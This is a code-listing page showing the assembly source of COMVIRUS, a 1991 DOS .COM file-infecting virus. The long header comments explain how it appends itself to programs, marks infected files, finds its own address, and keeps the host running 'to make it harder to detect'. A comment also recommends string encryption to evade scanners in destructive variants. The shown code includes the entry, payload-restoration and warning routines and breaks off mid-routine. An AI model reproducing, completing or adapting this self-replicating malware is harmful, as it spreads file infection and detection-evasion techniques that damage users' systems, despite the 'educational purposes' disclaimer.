📄 cv4-30.asm
字号:
title COMVIRUS
subttl By Drew Eckhardt
subttl Latest revision: 4-28-1991
;The author of this virus intends it to be used for educational
;purposes only, and assumes no responsibilities for its release,
;dammages resulting from its use, including but not limited to
;equipment dammage or data loss.
;By assembling or examining this program, The user agrees to accept all
;responsibility for this programs use, or any portions of the code
;or concepts contained within. The user also agrees to not publicly release
;this virus, and to exercise necessary precautions to prevent its escape.
;The user accepts all responsibility arising from his actions.
;Don't come crying to me if your hard disk gets infected,
;as THERE IS NO ANTIDOTE. HAHAHAH.
;Revision history:
;4-13: initial bug-free release, size=424 bytes with carrier
;4-15: added no date change support, size=438 bytes with carrier
;4-16: minor documentation changes, size=438 bytes with carrier,
; NO CODE CHANGE from 4-15 revision
;4-21: fixed missing hex h suffixs, made MASM friendly,
; fixed incorrect assume statement (assume statements are ignored
; by A86) enabled hard/floppy infection based on floppy_only status
; size=438 bytes IF floppy_only, 424 bytes if not, with carrier.
; minimum virus length = 419 bytes
;4-23: added control over how many programs are infected per run,
; switched method of infection, from copying to DTA then writing
; to disk to straight write to disk from memory.
; size=412 bytes IF floppy_only, 398 bytes if not, with carrier.
; minimum virus length = 393 bytes
;4-28: used set DTA instead of default DTA/copy command line
; buffer, which had been used based on incorrect assumption
; eliminated calls to get time/date, get attribs
; by using information from find first/find next functions 4eh/4fh
; made warning optional for reduced space if desired. Also
; changed mov reg16, bp add reg16, constant to shorter LEA instruction.
; size=354 bytes IF floppy_only, warning on W/carrier
; 340 bytes IF w/warning & carrier program
; 286 bytes w/o warning, in program
; minimum virus length = 281 bytes for virus itself
;4-28pm: instead of near CALL-pop sequences everywhere, switched to
; a single CALL near ptr Reference_Point, putting the result into
; si now that (until the end) string mode addressing is not used.
; Changed places where a register (used as an index)
; was being loaded THEN added to a single LEA isntruction
; size = 340 bytes if floppy_only, warning on w/carrier
; size = 326 bytes if w/warning & carrier
; size = 272 w/o warning
; minimum virus length = 267 bytes for the virus itself
;4-28pm2: Eliminated unecessary flush buffers call.
; size = 336 bytes if floppy_only w/carrier
; size = 322 bytes w/warning & carrier
; size = 268 w/o warning
; minimum virus length = 263 bytes for virus itself
;4-30: restored 5 bytes of original code at CS:0100
; before infecting other programs, allowing the
; original code field to be modified so one disk write could be
; used instead of two
; minor documentation revisions - corrected incorrect
; opcodes in documentation
; size = 326 bytes if floppy_only w/carrier
; size = 312 bytes w/warning & carrier program
; size = 258 bytes w/carrier program
; Minimum virus length = 253 bytes for the virus itself
;NOTE: The program is currently "set up" for A86 assembly with all
;conditional assembly symbols. #IF and #ENDIF should be replaced with
;MASM IFDEF and ENDIF directives for propper operation.
;Also, instead of using EQUates to define control symbols, the /D
;option or DEFINE could be used.....
;COMVIRUS.ASM must be assembled into a .COM file inorder to function
;properly. For convieniece, I recommend an assembler like A86 that will
;assemble to a .COM file without having to go through LINK and EXE2BIN
;As is, it will infect .COM files located on the current disk.
;ONLY if it is a floppy disk, ONLY in the root directory.
;This is a .COM infector virus, which, does nothing other than print a
;warning message, and spread to all files on the default disk IFF it is
;a floppy disk, in the root directory.
;Theory:
;This is a non - overwriting virus. I took special precautions to preserve
;all functionality of the original program, including command line, parsed FCB,
;and segment register preservation. This makes the virus harder to detect.
;The .COM file is a memory image - with no relocation table. Thus, it
;is an easy target for a virus such as this.
;Infected file format
;jmp near ptr xxxx
;cli cli ;ID bytes
;ORIGINAL program code, sans 5 bytes
;5 bytes ORIGINAL program code
;VIRUS
;This format makes infection VERY simple. We merely check for our signature
;(in this case cli cli (fa fa) - instructions that no programmer in his
;right mind would use - loading the original five bytes in the process.
;These original bytes are written to the end of the program, then
;A jump to where the virus is.
;While infection is easy, this method presents some coding problems, as the
;virus does not know where in memory it is. Therefor, When we want to access
;data, we FIND OUT where we are, by performing a near call which PUSHES ip to the
;stack which is then popped. Addresses are then calculated relative to this
;via LEA
;To run the program as normal, command line is restored, registers restored,
;And original code copied onto the first five bytes of the program.
;Program control symbols defined here
floppy_only equ 1
infect_per_run equ 1 ;number of programs infected per run
warn_user equ 1
_TEXT segment byte 'CODE'
assume cs:_TEXT,ds:_TEXT,es:_TEXT,ss:_TEXT
org 100h
Start: jmp infect;
;This is our signature
cli
cli
;Original code is the data field where we store the original program code
;which will replace our signature and jmp to infect
Original_Code: int 20h ;five bytes that simply terminate
nop ;the program
nop
nop
;Data for the virus. In a destructive virus, you would want to encrypt
;any strings using a simple one's complement (not) operation so as to
;thwart detection via text search utilities. Since we want detection to
;be easy, this un-encrypted form is fine.
Start_Virus:
#IF warn_user
Warning db "This file infected with COMVIRUS 1.0",10,13,'$'
#ENDIF
;VirusMask is simply an ASCIIZ terminated string of the files we wish to
;infect.
VirusMask db '*.COM', 0
Infect:
push ax ;on entry to a .COM program, STACK:
;MS-DOS puts drive identifiers ax (drive id for FCB's) <-- sp
;for the two FCB's in here. Save
;'em
;I use special trickery to find location of data. Since
;NEAR calls/jmps are RELATIVE, call near ptr find_warn is
;translated to e8 0000 - which will simply place the location
;of Reference onto the stack. Our data can be found relative to
;this point.
call near ptr Reference ;All data is reference realative to
;Reference
Reference: pop bx ;which is placed into bx for LEA
;instructions
;bx now contains the REAL address of
;Reference
;si points to real address of original
;code field
lea si, [bx-(offset Reference - offset Original_Code)]
mov di, 0100h ;original code is at 100h
mov cx, 5 ;5 bytes
cld ;from start of buffer
rep movsb ;do it
mov si, bx ;since BX is used in handle
;based DOS calls, for the remainder
;of the virus, si will contain the
;actual address of reference
#IF warn_user
;Always calculate the address of data relative to known Reference
;Point
lea dx, [si-(offset Reference - offset Warning)]
mov ah,9h ;DO dos call, DS:DX pointing
int 21h ;to $ terminated string
;We want to make sure that the user gets the message
WaitForKey:
mov ah, 0bh ;we will wait for a keypress
int 21h ;signifying the user has
or al, al ;seen the message.
jz WaitForKey
#ENDIF
#IF FLOPPY_ONLY
;Since this is a simple demonstration virus, we will only infect
;.COM files on the default drive IFF it is a floppy disk....
;So, we will get information about the disk drive.
push ds ;ds:bx returns a byte to
;media descriptor
mov ah, 1bh ;get disk information STACK
int 21h ;DOIT ax (drive ID's)
cmp byte ptr ds:[bx], 0f8h ;see if its a hard disk ds <--sp
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -